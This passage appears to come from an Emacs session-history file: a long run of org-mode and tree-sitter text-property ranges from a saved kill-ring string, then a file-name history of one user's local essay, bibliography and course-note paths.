(evil-yank-line-handler nil t)) 2601 2606 (fontified t yank-handler (evil-yank-line-handler nil t)) 2606 2678 (fontified t yank-handler (evil-yank-line-handler nil t)) 2678 2729 (fontified t yank-handler (evil-yank-line-handler nil t)) 2729 2730 (fontified t yank-handler (evil-yank-line-handler nil t)) 2730 2798 (fontified t yank-handler (evil-yank-line-handler nil t)) 2798 2809 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 2809 2869 (fontified t yank-handler (evil-yank-line-handler nil t)) 2869 2870 (fontified t yank-handler (evil-yank-line-handler nil t)) 2870 2886 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2886 2887 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2887 2889 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2889 2890 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2890 2893 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2893 2909 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2909 2918 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2918 2919 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 2919 2920 (fontified t yank-handler (evil-yank-line-handler nil t)) 2920 2939 (fontified t yank-handler (evil-yank-line-handler nil t)) 2939 2940 (fontified t yank-handler (evil-yank-line-handler nil t)) 2940 2956 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2956 2957 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2957 2959 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2959 2960 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2960 2964 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2964 2980 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2980 2989 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 2989 2990 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 2990 2991 (fontified t yank-handler (evil-yank-line-handler nil t)) 2991 2992 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 2992 2993 (face (org-superstar-header-bullet org-level-2) fontified t yank-handler (evil-yank-line-handler nil t)) 2993 2994 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 2994 3013 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 3013 3014 (fontified t yank-handler (evil-yank-line-handler nil t)) 3014 3015 (fontified t yank-handler (evil-yank-line-handler nil t)) 3015 3088 (fontified t yank-handler (evil-yank-line-handler nil t)) 3088 3175 (fontified t yank-handler (evil-yank-line-handler nil t)) 3175 3176 (fontified t yank-handler (evil-yank-line-handler nil t)) 3176 3282 (fontified t yank-handler (evil-yank-line-handler nil t)) 3282 3298 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 3298 3360 (fontified t yank-handler (evil-yank-line-handler nil t)) 3360 3361 (fontified t yank-handler (evil-yank-line-handler nil t)) 3361 3362 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 3362 3363 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 3363 3364 (face (org-superstar-header-bullet org-level-3) fontified t yank-handler (evil-yank-line-handler nil t)) 3364 3365 (face org-level-3 fontified t yank-handler (evil-yank-line-handler nil t)) 3365 3378 (face org-level-3 fontified t yank-handler (evil-yank-line-handler nil t)) 3378 3379 (fontified t yank-handler (evil-yank-line-handler nil t)) 3379 3391 (font-lock-fontified t face org-drawer fontified t yank-handler (evil-yank-line-handler nil t)) 3391 3392 (fontified t yank-handler (evil-yank-line-handler nil t)) 3392 3396 (face org-special-keyword fontified t yank-handler (evil-yank-line-handler nil t)) 3396 3403 (fontified t yank-handler (evil-yank-line-handler nil t)) 3403 3439 (face org-property-value fontified t yank-handler (evil-yank-line-handler nil t)) 3439 3440 (fontified t yank-handler (evil-yank-line-handler nil t)) 3440 3445 (font-lock-fontified t face org-drawer fontified t yank-handler (evil-yank-line-handler nil t)) 3445 3446 (fontified t yank-handler (evil-yank-line-handler nil t)) 3446 3447 (fontified t yank-handler (evil-yank-line-handler nil t)) 3447 3533 (fontified t yank-handler (evil-yank-line-handler nil t)) 3533 3606 (fontified t yank-handler (evil-yank-line-handler nil t)) 3606 3607 (fontified t yank-handler (evil-yank-line-handler nil t)) 3607 3672 (fontified t yank-handler (evil-yank-line-handler nil t)) 3672 3753 (fontified t yank-handler (evil-yank-line-handler nil t)) 3753 3754 (fontified t yank-handler (evil-yank-line-handler nil t)) 3754 3776 (fontified t yank-handler (evil-yank-line-handler nil t)) 3776 3791 (org-emphasis t font-lock-multiline t face (org-code) fontified t yank-handler (evil-yank-line-handler nil t)) 3791 3793 (fontified t yank-handler (evil-yank-line-handler nil t)) 3793 3816 (fontified t yank-handler (evil-yank-line-handler nil t)) 3816 3853 (org-emphasis t font-lock-multiline t face (org-code) fontified t yank-handler (evil-yank-line-handler nil t)) 3853 3855 (fontified t yank-handler (evil-yank-line-handler nil t)) 3855 3856 (fontified t yank-handler (evil-yank-line-handler nil t)) 3856 3857 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 3857 3858 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 3858 3859 (face (org-superstar-header-bullet org-level-3) fontified t yank-handler (evil-yank-line-handler nil t)) 3859 3860 (face org-level-3 fontified t yank-handler (evil-yank-line-handler nil t)) 3860 3864 (face org-level-3 fontified t yank-handler (evil-yank-line-handler nil t)) 3864 3865 (fontified t yank-handler (evil-yank-line-handler nil t)) 3865 3866 (fontified t yank-handler (evil-yank-line-handler nil t)) 3866 4004 (fontified t yank-handler (evil-yank-line-handler nil t)) 4004 4087 (fontified t yank-handler (evil-yank-line-handler nil t)) 4087 4088 (fontified t yank-handler (evil-yank-line-handler nil t)) 4088 4132 (fontified t yank-handler (evil-yank-line-handler nil t)) 4132 4160 (org-emphasis t font-lock-multiline t face (org-code) fontified t yank-handler (evil-yank-line-handler nil t)) 4160 4162 (fontified t yank-handler (evil-yank-line-handler nil t)) 4162 4178 (fontified t yank-handler (evil-yank-line-handler nil t)) 4178 4208 (fontified t yank-handler (evil-yank-line-handler nil t)) 4208 4232 (org-emphasis t font-lock-multiline t face (org-code) fontified t yank-handler (evil-yank-line-handler nil t)) 4232 4234 (fontified t yank-handler (evil-yank-line-handler nil t)) 4234 4235 (fontified t yank-handler (evil-yank-line-handler nil t)) 4235 4236 (fontified t yank-handler (evil-yank-line-handler nil t)) 4236 4237 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 4237 4238 (face (org-superstar-header-bullet org-level-2) fontified t yank-handler (evil-yank-line-handler nil t)) 4238 4239 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 4239 4252 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 4252 4253 (fontified t yank-handler (evil-yank-line-handler nil t)) 4253 4254 (fontified t yank-handler (evil-yank-line-handler nil t)) 4254 4259 (fontified t yank-handler (evil-yank-line-handler nil t)) 4259 4267 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 4267 4372 (fontified t yank-handler (evil-yank-line-handler nil t)) 4372 4373 (fontified t yank-handler (evil-yank-line-handler nil t)) 4373 4444 (fontified t yank-handler (evil-yank-line-handler nil t)) 4444 4523 (fontified t yank-handler (evil-yank-line-handler nil t)) 4523 4524 (fontified t yank-handler (evil-yank-line-handler nil t)) 4524 4611 (fontified t yank-handler (evil-yank-line-handler nil t)) 4611 4612 (fontified t yank-handler (evil-yank-line-handler nil t)) 4612 4628 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4628 4629 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4629 4631 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4631 4632 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4632 4637 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4637 4643 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4643 4644 (src-block t face (tree-sitter-hl-face:operator org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4644 4654 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4654 4665 (src-block t face (tree-sitter-hl-face:comment org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4665 4666 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4666 4675 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4675 4676 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 4676 4677 (fontified t yank-handler (evil-yank-line-handler nil t)) 4677 4693 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4693 4694 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4694 4696 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4696 4717 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4717 4718 (src-block t face (tree-sitter-hl-face:operator org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4718 4728 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4728 4739 (src-block t face (tree-sitter-hl-face:comment org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4739 4740 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4740 4749 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4749 4750 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 4750 4751 (fontified t yank-handler (evil-yank-line-handler nil t)) 4751 4796 (fontified t yank-handler (evil-yank-line-handler nil t)) 4796 4797 (fontified t yank-handler (evil-yank-line-handler nil t)) 4797 4813 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4813 4814 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4814 4816 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4816 4837 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4837 4838 (src-block t face (tree-sitter-hl-face:operator org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4838 4846 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4846 4857 (src-block t face (tree-sitter-hl-face:comment org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4857 4858 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4858 4867 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4867 4868 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 4868 4869 (fontified t yank-handler (evil-yank-line-handler nil t)) 4869 4885 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4885 4886 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4886 4888 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4888 4889 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4889 4894 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4894 4900 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4900 4901 (src-block t face (tree-sitter-hl-face:operator org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4901 4910 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4910 4921 (src-block t face (tree-sitter-hl-face:comment org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4921 4922 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4922 4931 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 4931 4932 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 4932 4933 (fontified t yank-handler (evil-yank-line-handler nil t)) 4933 4934 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 4934 4935 (face (org-superstar-header-bullet org-level-2) fontified t yank-handler (evil-yank-line-handler nil t)) 4935 4936 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 4936 4949 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 4949 4950 (fontified t yank-handler (evil-yank-line-handler nil t)) 4950 4951 (fontified t yank-handler (evil-yank-line-handler nil t)) 4951 5032 (fontified t yank-handler (evil-yank-line-handler nil t)) 5032 5056 (fontified t yank-handler (evil-yank-line-handler nil t)) 5056 5062 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 5062 5104 (fontified t yank-handler (evil-yank-line-handler nil t)) 5104 5110 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 5110 5112 (fontified t yank-handler (evil-yank-line-handler nil t)) 5112 5113 (fontified t yank-handler (evil-yank-line-handler nil t)) 5113 5136 (fontified t yank-handler (evil-yank-line-handler nil t)) 5136 5152 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 5152 5199 (fontified t yank-handler (evil-yank-line-handler nil t)) 5199 5279 (fontified t yank-handler (evil-yank-line-handler nil t)) 5279 5280 (fontified t yank-handler (evil-yank-line-handler nil t)) 5280 5296 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5296 5297 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5297 5299 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5299 5300 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5300 5304 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5304 5305 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5305 5307 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5307 5310 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5310 5312 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5312 5330 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5330 5335 (src-block t face (tree-sitter-hl-face:comment org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5335 5336 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5336 5345 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5345 5346 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 5346 5347 (fontified t yank-handler (evil-yank-line-handler nil t)) 5347 5363 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5363 5364 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5364 5366 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5366 5367 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5367 5371 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5371 5372 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5372 5374 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5374 5377 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5377 5379 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5379 5380 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5380 5382 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5382 5400 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5400 5405 (src-block t face (tree-sitter-hl-face:comment org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5405 5406 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5406 5415 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5415 5416 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 5416 5417 (fontified t yank-handler (evil-yank-line-handler nil t)) 5417 5418 (fontified t yank-handler (evil-yank-line-handler nil t)) 5418 5419 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 5419 5420 (face (org-superstar-header-bullet org-level-2) fontified t yank-handler (evil-yank-line-handler nil t)) 5420 5421 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 5421 5440 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 5440 5441 (fontified t yank-handler (evil-yank-line-handler nil t)) 5441 5442 (fontified t yank-handler (evil-yank-line-handler nil t)) 5442 5487 (fontified t yank-handler (evil-yank-line-handler nil t)) 5487 5491 (org-emphasis t font-lock-multiline t face (org-code) fontified t yank-handler (evil-yank-line-handler nil t)) 5491 5504 (fontified t yank-handler (evil-yank-line-handler nil t)) 5504 5655 (fontified t yank-handler (evil-yank-line-handler nil t)) 5655 5734 (fontified t yank-handler (evil-yank-line-handler nil t)) 5734 5769 (fontified t yank-handler (evil-yank-line-handler nil t)) 5769 5770 (fontified t yank-handler (evil-yank-line-handler nil t)) 5770 5827 (org-emphasis t font-lock-multiline t face (org-code) fontified t yank-handler (evil-yank-line-handler nil t)) 5827 5828 (fontified t yank-handler (evil-yank-line-handler nil t)) 5828 5829 (fontified t yank-handler (evil-yank-line-handler nil t)) 5829 5923 (fontified t yank-handler (evil-yank-line-handler nil t)) 5923 5924 (fontified t yank-handler (evil-yank-line-handler nil t)) 5924 5940 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5940 5941 (face org-block-begin-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5941 5943 (src-block t face (tree-sitter-hl-face:function\.call org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5943 5944 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5944 5950 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5950 5956 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5956 5958 (src-block t face (tree-sitter-hl-face:constant org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5958 5959 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5959 5988 (src-block t face (tree-sitter-hl-face:string org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5988 5989 (src-block t face (org-block) font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5989 5998 (face org-block-end-line font-lock-multiline t font-lock-fontified t fontified t yank-handler (evil-yank-line-handler nil t)) 5998 5999 (face org-block-end-line fontified t yank-handler (evil-yank-line-handler nil t)) 5999 6000 (fontified t yank-handler (evil-yank-line-handler nil t)) 6000 6001 (fontified t yank-handler (evil-yank-line-handler nil t)) 6001 6002 (face (org-superstar-header-bullet org-level-1) fontified t yank-handler (evil-yank-line-handler nil t)) 6002 6003 (face org-level-1 fontified t yank-handler (evil-yank-line-handler nil t)) 6003 6021 (face org-level-1 fontified t yank-handler (evil-yank-line-handler nil t)) 6021 6022 (fontified t yank-handler (evil-yank-line-handler nil t)) 6022 6023 (fontified t yank-handler (evil-yank-line-handler nil t)) 6023 6180 (fontified t yank-handler (evil-yank-line-handler nil t)) 6180 6181 (fontified t yank-handler (evil-yank-line-handler nil t)) 6181 6182 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 6182 6183 (face (org-superstar-header-bullet org-level-2) fontified t yank-handler (evil-yank-line-handler nil t)) 6183 6184 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 6184 6200 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 6200 6201 (fontified t yank-handler (evil-yank-line-handler nil t)) 6201 6202 (fontified t yank-handler (evil-yank-line-handler nil t)) 6202 6286 (fontified t yank-handler (evil-yank-line-handler nil t)) 6286 6291 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 6291 6293 (fontified t yank-handler (evil-yank-line-handler nil t)) 6293 6388 (fontified t yank-handler (evil-yank-line-handler nil t)) 6388 6389 (fontified t yank-handler (evil-yank-line-handler nil t)) 6389 6415 (fontified t yank-handler (evil-yank-line-handler nil t)) 6415 6436 (org-emphasis t font-lock-multiline t face (org-code) fontified t yank-handler (evil-yank-line-handler nil t)) 6436 6439 (fontified t yank-handler (evil-yank-line-handler nil t)) 6439 6482 (org-emphasis t font-lock-multiline t face (org-code) fontified t yank-handler (evil-yank-line-handler nil t)) 6482 6498 (fontified t yank-handler (evil-yank-line-handler nil t)) 6498 6499 (fontified t yank-handler (evil-yank-line-handler nil t)) 6499 6500 (face org-superstar-leading fontified t yank-handler (evil-yank-line-handler nil t)) 6500 6501 (face (org-superstar-header-bullet org-level-2) fontified t yank-handler (evil-yank-line-handler nil t)) 6501 6502 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 6502 6516 (face org-level-2 fontified t yank-handler (evil-yank-line-handler nil t)) 6516 6517 (fontified t yank-handler (evil-yank-line-handler nil t)) 6517 6518 (fontified t yank-handler (evil-yank-line-handler nil t)) 6518 6552 (fontified t yank-handler (evil-yank-line-handler nil t)) 6552 6560 (org-emphasis t font-lock-multiline t face (org-code) fontified t yank-handler (evil-yank-line-handler nil t)) 6560 6650 (fontified t yank-handler (evil-yank-line-handler nil t)) 6650 6689 (fontified t yank-handler (evil-yank-line-handler nil t)) 6689 6697 (org-emphasis t font-lock-multiline t face (org-code) fontified t yank-handler (evil-yank-line-handler nil t)) 6697 6699 (fontified t yank-handler (evil-yank-line-handler nil t)) 6699 6700 (fontified t yank-handler (evil-yank-line-handler nil t)) 6700 6701 (face (org-superstar-header-bullet org-level-1) fontified t yank-handler (evil-yank-line-handler nil t)) 6701 6702 (face org-level-1 fontified t yank-handler (evil-yank-line-handler nil t)) 6702 6712 (face org-level-1 fontified t yank-handler (evil-yank-line-handler nil t)) 6712 6713 (fontified t yank-handler (evil-yank-line-handler nil t)) 6713 6714 (fontified t yank-handler (evil-yank-line-handler nil t)) 6714 6722 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 6722 6843 (fontified t yank-handler (evil-yank-line-handler nil t)) 6843 6844 (fontified t yank-handler (evil-yank-line-handler nil t)) 6844 6874 (fontified t yank-handler (evil-yank-line-handler nil t)) 6874 6882 (org-emphasis t font-lock-multiline t face (org-verbatim) fontified t yank-handler (evil-yank-line-handler nil t)) 6882 6948 (fontified t yank-handler (evil-yank-line-handler nil t))))))
(setq file-name-history '("~/11Trim-22P/ArteCiencia/ensayo6/ensayo.org" "~/google-drive/org-roam/" "~/11Trim-22P/ArteCiencia/ensayo4/ensayo.org" "~/11Trim-22P/ArteCiencia/ensayo5/ensayo.org" "~/dev/los-museos/" #("/home/luisbarrera/11Trim-22P/ArteCiencia/ensayo4/refs.bib" 0 57 (ivy-index 0)) #("/home/luisbarrera/11Trim-22P/ArteCiencia/ensayo4/ensayo.org" 0 59 (ivy-index 0)) #("/home/luisbarrera/11Trim-22P/ArteCiencia/ensayo3/refs.bib" 0 57 (ivy-index 0)) #("/home/luisbarrera/11Trim-22P/ArteCiencia/ensayo3/ensayo.org" 0 59 (ivy-index 0)) #("/home/luisbarrera/11Trim-22P/ArteCiencia/ensayo2/ensayo2.org" 0 60 (ivy-index 5)) #("/home/luisbarrera/11Trim-22P/ArteCiencia/ensayo2/refs.bib" 0 57 (ivy-index 1)) #("/home/luisbarrera/11Trim-22P/ArteCiencia/2Sem/" 0 46 (ivy-index 0)) #("/home/luisbarrera/11Trim-22P/ArteCiencia/ensayo2/ensayo1.org" 0 60 (ivy-index 7)) #("/home/luisbarrera/11Trim-22P/ArteCiencia/2Sem/refs.bib" 0 54 (ivy-index 0)) #("/home/luisbarrera/11Trim-22P/ArteCiencia/2Sem/ensayo1.org" 0 57 (ivy-index 2)) #("/home/luisbarrera/11Trim-22P/ArteCiencia/2Sem/file.bib" 0 54 (ivy-index 0)) #("/home/luisbarrera/11Trim-22P/ArteCiencia/2Sem/test.org" 0 54 (ivy-index 0)) #("/home/luisbarrera/11Trim-22P/ArteCiencia/" 0 41 (ivy-index 5)) #("/home/luisbarrera/google-drive/org-mode/Tareas21I.org" 0 53 (ivy-index 3)) #("/home/luisbarrera/google-drive/org-mode/clases22p.org" 0 53 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/tareas22p.org" 0 53 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/tareas22p,org" 0 53 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/tareas21p.org" 0 53 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/draft.org" 0 49 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/ioslide-template/" 0 57 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/ioslide-template.org" 0 60 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/test.html" 0 49 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/index.txt" 0 49 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/index.org" 0 49 (ivy-index 0)) #("/home/luisbarrera/dev/alarma-arduino/" 0 37 (ivy-index 0)) #("/home/luisbarrera/google-drive/org-mode/Org-mobile.org" 0 54 (ivy-index 0)) #("/home/luisbarrera/.dotfiles/emacs/.emacs.d/" 0 43 (ivy-index 0)) #("/home/luisbarrera/.emacs.d/init.el" 0 34 (ivy-index 0)) #("/home/luisbarrera/google-drive/Trim10-22I/Lenguajes/11Sem/draw_sol.py" 0 69 (ivy-index 0)) 